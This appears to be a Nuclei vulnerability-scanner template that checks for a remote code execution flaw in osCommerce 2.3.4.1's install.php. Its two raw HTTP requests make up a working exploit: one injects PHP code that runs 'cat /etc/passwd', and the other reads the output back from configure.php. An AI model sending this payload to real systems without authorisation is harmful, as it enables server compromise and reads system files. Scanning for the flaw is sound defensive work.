id: oscommerce-rce

info:
  name: osCommerce 2.3.4.1 - Remote Code Execution
  author: Suman_Kar
  severity: high
  description: osCommerce 2.3.4.1 is susceptible to remote code execution via install.php. A remote attacker can inject PHP code into the db_database parameter and subsequently use the configure.php page to to read the command's executed output.
  reference:
    - https://www.exploit-db.com/exploits/50128
    - https://github.com/nobodyatall648/osCommerce-2.3.4-Remote-Command-Execution
  metadata:
    max-request: 2
  tags: rce,oscommerce,edb

http:
  - raw:
      - |
        POST /install/install.php?step=4 HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        DIR_FS_DOCUMENT_ROOT=.%2F&DB_DATABASE=%27%29%3Bpassthru%28%27cat+%2Fetc%2Fpasswd%27%29%3B%2F%2A
      - |
        GET /install/includes/configure.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022028e10b225693f5b1e40608615a7923d4285aa2165744dc027a3abc94cd4c2034022100a54d57552370958d79ca822356828d10123cfb0823a4c86d6456abc294e55e0d:922c64590222798bb761d5b6d8e72950